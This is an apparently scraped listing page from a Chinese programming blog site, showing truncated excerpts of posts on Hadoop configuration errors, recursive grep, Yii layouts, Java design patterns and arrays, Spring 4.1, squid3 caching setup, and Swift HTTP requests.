    由于原来配置的hadoop data目录快要用满了,故准备修改配置文件增加数据目录,以便扩容,但由于疏忽,把core-site.xml, hdfs-site.xml配置文件dfs.datanode.data.dir 配置项增加了配置目录,但未创建实际目录,重启datanode服务时,报如下错误: 2014-11-18 08:51:39,128 WARN org.apache.hadoop.h
  • grep 目录级联查找 dongwei_6688 grep
           在Mac或者Linux下使用grep进行文件内容查找时,如果给定的目标搜索路径是当前目录,那么它默认只搜索当前目录下的文件,而不会搜索其下面子目录中的文件内容,如果想级联搜索下级目录,需要使用一个“-r”参数: grep -n -r "GET" .   上面的命令将会找出当前目录“.”及当前目录中所有下级目录
  • yii 修改模块使用的布局文件 dcj3sjt126com yiilayouts
    方法一:yii模块默认使用系统当前的主题布局文件,如果在主配置文件中配置了主题比如: 'theme'=>'mythm', 那么yii的模块就使用 protected/themes/mythm/views/layouts 下的布局文件; 如果未配置主题,那么 yii的模块就使用  protected/views/layouts 下的布局文件, 总之默认不是使用自身目录 pr
  • 设计模式之单例模式 come_for_dream 设计模式单例模式懒汉式饿汉式双重检验锁失败无序写入
                    今天该来的面试还没来,这个店估计不会来电话了,安静下来写写博客也不错,没事翻了翻小易哥的博客甚至与大牛们之间的差距,基础知识不扎实建起来的楼再高也只能是危楼罢了,陈下心回归基础把以前学过的东西总结一下。   *********************************
  • 8、数组 豆豆咖啡 二维数组数组一维数组
      一、概念       数组是同一种类型数据的集合。其实数组就是一个容器。   二、好处       可以自动给数组中的元素从0开始编号,方便操作这些元素   三、格式   //一维数组 1,元素类型[] 变量名 = new 元素类型[元素的个数] int[] arr =
  • Decode Ways hcx2013 decode
    A message containing letters from A-Z is being encoded to numbers using the following mapping: 'A' -> 1 'B' -> 2 ... 'Z' -> 26 Given an encoded message containing digits, det
  • Spring4.1新特性——异步调度和事件机制的异常处理 jinnianshilongnian spring 4.1
    目录 Spring4.1新特性——综述 Spring4.1新特性——Spring核心部分及其他 Spring4.1新特性——Spring缓存框架增强 Spring4.1新特性——异步调用和事件机制的异常处理 Spring4.1新特性——数据库集成测试脚本初始化 Spring4.1新特性——Spring MVC增强 Spring4.1新特性——页面自动化测试框架Spring MVC T
  • squid3(高命中率)缓存服务器配置 liyonghui160com
        系统:centos 5.x   需要的软件:squid-3.0.STABLE25.tar.gz 1.下载squid wget http://www.squid-cache.org/Versions/v3/3.0/squid-3.0.STABLE25.tar.gz tar zxf squid-3.0.STABLE25.tar.gz &&
  • 避免Java应用中NullPointerException的技巧和最佳实践 pda158 java
    1) 从已知的String对象中调用equals()和equalsIgnoreCase()方法,而非未知对象。   总是从已知的非空String对象中调用equals()方法。因为equals()方法是对称的,调用a.equals(b)和调用b.equals(a)是完全相同的,这也是为什么程序员对于对象a和b这么不上心。如果调用者是空指针,这种调用可能导致一个空指针异常 Object unk
  • 如何在Swift语言中创建http请求 shoothao httpswift
    概述:本文通过实例从同步和异步两种方式上回答了”如何在Swift语言中创建http请求“的问题。 如果你对Objective-C比较了解的话,对于如何创建http请求你一定驾轻就熟了,而新语言Swift与其相比只有语法上的区别。但是,对才接触到这个崭新平台的初学者来说,他们仍然想知道“如何在Swift语言中创建http请求?”。 在这里,我将作出一些建议来回答上述问题。常见的
  • Spring事务的传播方式 uule spring事务
    传播方式:        新建事务       required       required_new   - 挂起当前         非事务方式运行       supports   &nbs
按字母分类: ABCDEFGHIJKLMNOPQRSTUVWXYZ其他